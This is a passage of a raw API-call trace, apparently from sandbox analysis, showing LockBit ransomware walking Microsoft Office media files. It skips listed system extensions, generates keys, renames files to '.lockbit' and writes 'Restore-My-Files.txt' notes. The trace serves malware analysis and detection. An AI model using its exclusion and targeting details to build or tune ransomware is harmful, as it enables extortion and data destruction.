wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285926.WMF.lockbit") returned 70 [0197.565] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285926.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285926.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.567] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.567] malloc (_Size=0x40068) returned 0x3df0008 [0197.567] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13394) returned 1 [0197.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.568] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.568] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285926.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285926.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.706] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.706] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.708] free (_Block=0x1fa2ed8) [0197.708] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285926.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.708] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.708] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf49a800, ftCreationTime.dwHighDateTime=0x1befd7c, ftLastAccessTime.dwLowDateTime=0xbd5f77e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbf49a800, ftLastWriteTime.dwHighDateTime=0x1befd7c, nFileSizeHigh=0x0, nFileSizeLow=0x9e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0286034.WMF", cAlternateFileName="")) returned 1 [0197.708] lstrcmpiW (lpString1=".", lpString2="J0286034.WMF") returned -1 [0197.709] lstrcmpiW (lpString1="..", lpString2="J0286034.WMF") returned -1 [0197.709] PathFindExtensionW (pszPath="J0286034.WMF") returned=".WMF" [0197.709] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.709] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.709] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0286034.WMF") returned 1 [0197.710] lstrcmpiW (lpString1="ntldr", lpString2="J0286034.WMF") returned 1 [0197.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0286034.WMF") returned 1 [0197.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0286034.WMF") returned -1 [0197.710] lstrcmpiW (lpString1="autorun.inf", lpString2="J0286034.WMF") returned -1 [0197.710] lstrcmpiW (lpString1="thumbs.db", lpString2="J0286034.WMF") returned 1 [0197.710] lstrcmpiW (lpString1="iconcache.db", lpString2="J0286034.WMF") returned -1 [0197.710] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.710] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286034.WMF") returned=".WMF" [0197.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.710] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.710] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.711] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.711] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286034.WMF.lockbit") returned 70 [0197.711] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286034.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0286034.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.713] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.713] malloc (_Size=0x40068) returned 0x3df0008 [0197.713] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2528) returned 1 [0197.713] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.714] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.720] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286034.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286034.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.720] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.720] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.720] free (_Block=0x1fa2ed8) [0197.720] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286034.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.720] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.720] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.720] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5efff00, ftCreationTime.dwHighDateTime=0x1befd7c, ftLastAccessTime.dwLowDateTime=0xbd5f77e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd5efff00, ftLastWriteTime.dwHighDateTime=0x1befd7c, nFileSizeHigh=0x0, nFileSizeLow=0x9d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0286068.WMF", cAlternateFileName="")) returned 1 [0197.720] lstrcmpiW (lpString1=".", lpString2="J0286068.WMF") returned -1 [0197.720] lstrcmpiW (lpString1="..", lpString2="J0286068.WMF") returned -1 [0197.720] PathFindExtensionW (pszPath="J0286068.WMF") returned=".WMF" [0197.720] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.720] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.720] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.720] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.720] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.720] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.721] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.721] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0286068.WMF") returned 1 [0197.722] lstrcmpiW (lpString1="ntldr", lpString2="J0286068.WMF") returned 1 [0197.722] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0286068.WMF") returned 1 [0197.722] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0286068.WMF") returned -1 [0197.722] lstrcmpiW (lpString1="autorun.inf", lpString2="J0286068.WMF") returned -1 [0197.722] lstrcmpiW (lpString1="thumbs.db", lpString2="J0286068.WMF") returned 1 [0197.722] lstrcmpiW (lpString1="iconcache.db", lpString2="J0286068.WMF") returned -1 [0197.722] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.722] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286068.WMF") returned=".WMF" [0197.722] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.722] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.722] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.723] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.723] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286068.WMF.lockbit") returned 70 [0197.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286068.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0286068.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.725] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.725] malloc (_Size=0x40068) returned 0x3df0008 [0197.725] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2512) returned 1 [0197.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.726] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286068.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286068.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.729] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.729] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.730] free (_Block=0x1fa2ed8) [0197.730] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286068.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.730] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.730] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.730] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa019c00, ftCreationTime.dwHighDateTime=0x1bef57a, ftLastAccessTime.dwLowDateTime=0xbd5f77e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaa019c00, ftLastWriteTime.dwHighDateTime=0x1bef57a, nFileSizeHigh=0x0, nFileSizeLow=0xb21e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287005.WMF", cAlternateFileName="")) returned 1 [0197.730] lstrcmpiW (lpString1=".", lpString2="J0287005.WMF") returned -1 [0197.730] lstrcmpiW (lpString1="..", lpString2="J0287005.WMF") returned -1 [0197.730] PathFindExtensionW (pszPath="J0287005.WMF") returned=".WMF" [0197.730] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.730] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.731] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.731] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 